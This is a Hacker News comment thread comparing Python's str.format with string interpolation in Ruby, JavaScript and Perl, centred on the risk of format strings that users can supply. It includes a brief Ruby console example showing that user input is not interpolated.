Arguably Ruby is worse because you can execute instance methods in interpolation, but I still don't see why that's germane to this discussion other than to pick a fight about languages.

smitherfield · on Jan 1, 2017

Ruby string interpolation can only happen in literal source code, not in user input.

  2.4.0 :001 > a = 5
   => 5 
  2.4.0 :002 > gets.chomp
  #{a}
   => "\#{a}"

Manishearth · on Dec 31, 2016

These are only in literals, however. You cannot have a string value with interpolation exprs inside it (both in JS and Ruby)

jsjohnst · on Jan 1, 2017

See the parent comment I'm replying too. Parent is ridiculing Python "magic methods". If he thinks they are bad, just wait till he sees Ruby.

ak217 · on Dec 31, 2016

Until now I thought the new features were confined to `f""` format strings.

Edit: As correctly pointed out, this feature has been around since the introduction of str.format(). So this warning applies to all Python versions.

tedunangst · on Dec 31, 2016

This is not a new feature.

DasIch · on Dec 31, 2016

This is not a new feature.

throwaway91111 · on Dec 31, 2016

This existed in python 2.6; it's not a new feature by any means.

stevebmark · on Dec 31, 2016

Doesn't this apply to any language that has string interpolation, Ruby, Python, Javascript Perl, etc? And doesn't it not really matter, because it's not realistic to use a dynamic string template in a program?

Manishearth · on Dec 31, 2016

Ruby format strings are like old-style Python format strings. They only map to names or positional arguments. Perl also just maps to positional arguments, like printf. The most you can do is mess up the string by moving around positional args.

JS format strings get evaluated at "compile time", as do Ruby interpolation literals. You cannot have a string with format specifiers in it, you can have a backtick-delimited string literal with format specifiers in it. The formatting is done when the interpreter encounters this literal; the user can't input such a value since these literals aren't a different kind of value.

> because it's not realistic

Done reasonably often for i18n. Not a good i18n solution, but for many it's good enough :|

_kdhr · on Jan 1, 2017

> So what do you do if you do need to let someone else provide format strings? You can use the somewhat undocumented internals to change the behavior.

Well, that's just sloppy and shame on you for exposing programming internals to a user in a service. What did you expect? Write your own format string parser and stop being lazy.